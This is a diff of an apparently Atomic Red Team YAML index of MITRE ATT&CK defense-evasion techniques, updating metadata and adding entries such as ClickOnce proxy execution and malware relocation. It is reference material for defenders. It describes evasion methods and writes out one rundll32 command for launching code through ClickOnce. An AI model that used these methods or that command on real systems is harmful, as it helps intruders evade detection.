+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests:
     - name: C compile
@@ -14500,7 +14638,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -14526,12 +14664,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -14621,7 +14757,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -14679,12 +14814,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -14726,10 +14860,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -14753,18 +14886,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -14778,7 +14923,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -14790,20 +14935,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -14812,11 +14948,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -14825,6 +14960,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -14834,6 +14970,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -14845,13 +14982,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -14896,9 +15033,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
@@ -15173,18 +15307,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -15217,10 +15473,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -15257,40 +15512,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -15299,20 +15524,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -15342,7 +15597,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -15385,8 +15640,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -15433,7 +15686,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -15499,12 +15752,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -15559,33 +15810,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1036.010:
+    technique:
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
